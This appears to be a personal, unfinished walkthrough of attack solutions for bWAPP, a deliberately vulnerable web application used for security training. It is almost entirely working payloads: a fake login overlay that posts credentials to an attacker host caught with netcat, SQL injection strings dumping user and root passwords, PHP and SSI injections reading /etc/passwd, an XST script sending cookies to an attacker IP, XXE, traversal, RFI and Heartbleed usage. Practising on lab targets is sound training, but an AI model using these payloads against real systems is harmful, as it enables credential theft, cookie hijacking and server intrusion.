In progress rough solutions. This is not a comprehensive solution list. Updating whenever I have the time.
Ref sheet http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/
htmli_get.php
/bWAPP/htmli_get.php?firstname=%3Ch1%3EHello%3C%2Fh1%3E&lastname=%3Ch2%3EWorld%3C%2Fh2%3E&form=submit
<h1>Hello</h1>
<h2>World</h2>
XXX: Todo, IE only?
/bWAPP/htmli_current_url.php
Following solution taken from:
http://penthusiasts.blogspot.com/2013/12/bwapp-html-injection-all.html
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://AttackerIP/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
Attacker's machine:
nc -l 80
/bWAPP/phpi.php?message=a;echo "what"; $fp = fopen("/etc/passwd","r");$result = fread($fp,8192); echo $result
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="cat /etc/passwd" -->
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
/bWAPP/sqli_6.php
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
Use Burp
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
Use Burp
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
a%' UNION ALL SELECT 1, column_name, null, null, null, null, null from information_schema.columns where table_name="users";--
blah%' union all select 1,login,password,email,secret,1, 1 from users --
ok' or 1=1--
a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1; --
Be sure to add a space after the -- for this one, otherwise the injection will not work
asdf',(SELECT database() ))--
To begin enumerating tables:
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 0,1 ))--
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 1,1 ))--
asdf',(select password from mysql.user where user='root' ))--
Using Burp, do not allow the webpage to load captcha_box.php, this page loads the server's session variable $_SESSION["captcha"] which will then require a check on ba_captcha_bypass.php The second requirement is to prevent captcha_user from being submitted by the client. Eliminate this using Burp:
POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bepp:8088/bWAPP/ba_captcha_bypass.php
Cookie: PHPSESSID=67a6abb1d7ff40c55ad50d3aa43fc7c4; security_level=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
login=bee&password=bug&form=submit
xss_get.php
<script>alert(document.cookie)</script>
xss_post.php
<script>alert(document.cookie)</script>
Use Burp to unhide hidden fields or intercept POST param.
Change 'login' and 'secret' field to arbitrary values.
POST /bWAPP/xxe-2.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://bepp:8088/bWAPP/insecure_direct_object_ref_3.php
Content-Length: 59
Cookie: PHPSESSID=77aa634b546d1c78d5afc16aae328172; security_level=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<reset><login>bee</login><secret>Any bugs?</secret></reset>
bWAPP/insecure_direct_object_ref_2.php
Use Burp to unhide hidden ticket price field, or use proxy to modify the POST param while in transit.
Doesn't work on modern browsers as there are security enforcements. Maybe use phantomJS?
I modified the POC to use GET instead of TRACE. Additional changes from original xst.js include making the onreadystatechange NOT inline (seems to play better with FF).
-
Start listener on attacking machine: nc -l 8888
-
Modify xst.js to match your environment:
var xmlhttp;
// Code for IE7+, Firefox, Chrome, Opera, Safari
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
// Code for IE6, IE5
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=foo;
function foo()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
xmlResp=xmlhttp.responseText;
// document.getElementById("response").innerHTML=xmlResp
alert(xmlResp);
document.location="http://[attacker_ip]:8888/grab.cgi?"+document.cookie;
}
}
// xmlhttp.open("TRACE","/bWAPP/",true);
xmlhttp.open("GET","/bWAPP/",true);
// xmlhttp.withCredentials = true;
xmlhttp.send();
Use Burp to get cookie
Use the heartbleed.py script found in the /evil directory
python heartbleed.py [ip]
directory_traversal_2.php
/bWAPP/directory_traversal_2.php?directory=../../../../home/
directory_traversal_1.php
/bWAPP/directory_traversal_1.php?page=../../../../../etc/passwd
hostheader_1.php
hostheader_2.php
Copy rfi.txt to rfi.php, it appears PHP automatically adds the suffix .php.
bWAPP/rlfi.php?language=../evil/rfi